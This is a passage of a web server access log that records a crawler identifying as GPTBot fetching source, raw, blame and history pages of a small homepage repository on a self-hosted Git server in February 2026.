"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" -[17/Feb/2026:13:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" [Client 74.7.227.38] [Length 10763] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" -[17/Feb/2026:13:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" -[17/Feb/2026:13:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11655] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" -[17/Feb/2026:13:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13178] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" -[17/Feb/2026:13:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 196599] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11962] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" -[17/Feb/2026:13:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11648] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 74.7.227.38] [Length 11341] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 74.7.227.38] [Length 13281] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" -[17/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" -[17/Feb/2026:13:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12783] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" -[17/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" [Client 74.7.227.38] [Length 10603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" -[17/Feb/2026:13:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" -[17/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" -[17/Feb/2026:13:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" -[17/Feb/2026:13:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10859] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" -[17/Feb/2026:13:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10805] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" -[17/Feb/2026:13:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" -[17/Feb/2026:13:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12480] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" -[17/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" -[17/Feb/2026:13:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10758] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" -[17/Feb/2026:13:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" -[17/Feb/2026:13:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 74.7.227.38] [Length 10980] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" -[17/Feb/2026:13:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" [Client 74.7.227.38] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" -[17/Feb/2026:13:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13901] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" -[17/Feb/2026:13:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" -[17/Feb/2026:13:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" -[17/Feb/2026:13:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" -[17/Feb/2026:13:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" -[17/Feb/2026:13:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" -[17/Feb/2026:13:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 74.7.227.38] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11237] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" -[17/Feb/2026:13:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11882] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" -[17/Feb/2026:13:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11299] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" -[17/Feb/2026:13:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12976] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 18051] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 174877] [Gzip 16.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" -[17/Feb/2026:13:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" -[17/Feb/2026:13:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" -[17/Feb/2026:13:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11211] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" -[17/Feb/2026:13:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10381] [Gzip 3.20] [Sent-to 192.168.0.250] 